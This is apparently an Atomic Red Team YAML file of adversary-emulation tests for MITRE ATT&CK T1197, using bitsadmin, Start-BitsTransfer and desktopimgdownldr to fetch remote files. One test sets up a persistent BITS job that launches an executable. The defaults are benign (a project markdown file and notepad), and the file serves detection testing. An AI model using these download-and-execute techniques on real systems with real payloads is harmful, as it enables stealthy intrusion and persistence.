Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
119 lines
4.9 KiB
YAML
119 lines
4.9 KiB
YAML
attack_technique: T1197
|
|
display_name: BITS Jobs
|
|
atomic_tests:
|
|
- name: Bitsadmin Download (cmd)
|
|
auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421
|
|
description: |
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
and execute a payload
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
remote_file:
|
|
description: Remote file to download
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
|
|
local_file:
|
|
description: Local file path to save downloaded file
|
|
type: path
|
|
default: '%temp%\bitsadmin1_flag.ps1'
|
|
executor:
|
|
command: |
|
|
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
|
|
cleanup_command: |
|
|
del #{local_file} >nul 2>&1
|
|
name: command_prompt
|
|
- name: Bitsadmin Download (PowerShell)
|
|
auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
|
|
description: |
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
and execute a payload leveraging PowerShell
|
|
|
|
Upon execution you will find a github markdown file downloaded to the Temp directory
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
remote_file:
|
|
description: Remote file to download
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
|
|
local_file:
|
|
description: Local file path to save downloaded file
|
|
type: path
|
|
default: $env:TEMP\bitsadmin2_flag.ps1
|
|
executor:
|
|
command: |
|
|
Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
|
|
cleanup_command: |
|
|
Remove-Item #{local_file} -ErrorAction Ignore
|
|
name: powershell
|
|
- name: Persist, Download, & Execute
|
|
auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
|
|
description: |
|
|
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps.
|
|
Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable.
|
|
This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS"
|
|
This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
command_path:
|
|
description: Path of command to execute
|
|
type: path
|
|
default: C:\Windows\system32\notepad.exe
|
|
bits_job_name:
|
|
description: Name of BITS job
|
|
type: string
|
|
default: AtomicBITS
|
|
local_file:
|
|
description: Local file path to save downloaded file
|
|
type: path
|
|
default: '%temp%\bitsadmin3_flag.ps1'
|
|
remote_file:
|
|
description: Remote file to download
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
|
|
executor:
|
|
command: |
|
|
bitsadmin.exe /create #{bits_job_name}
|
|
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
|
|
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
|
|
bitsadmin.exe /resume #{bits_job_name}
|
|
ping -n 5 127.0.0.1 >nul 2>&1
|
|
bitsadmin.exe /complete #{bits_job_name}
|
|
cleanup_command: |
|
|
del #{local_file} >nul 2>&1
|
|
name: command_prompt
|
|
- name: Bits download using desktopimgdownldr.exe (cmd)
|
|
auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
|
|
description: |
|
|
This test simulates using desktopimgdownldr.exe to download a malicious file
|
|
instead of a desktop or lockscreen background img. The process that actually makes
|
|
the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”)
|
|
and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
remote_file:
|
|
description: Remote file to download
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
|
|
download_path:
|
|
description: Local file path to save downloaded file
|
|
type: path
|
|
default: 'SYSTEMROOT=C:\Windows\Temp'
|
|
cleanup_path:
|
|
description: path to delete file as part of cleanup_command
|
|
type: path
|
|
default: C:\Windows\Temp\Personalization\LockScreenImage
|
|
cleanup_file:
|
|
description: file to remove as part of cleanup_command
|
|
type: string
|
|
default: "*.md"
|
|
executor:
|
|
command: |
|
|
set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
|
|
cleanup_command: |
|
|
del #{cleanup_path}\#{cleanup_file} >nul 2>&1
|
|
name: command_prompt
|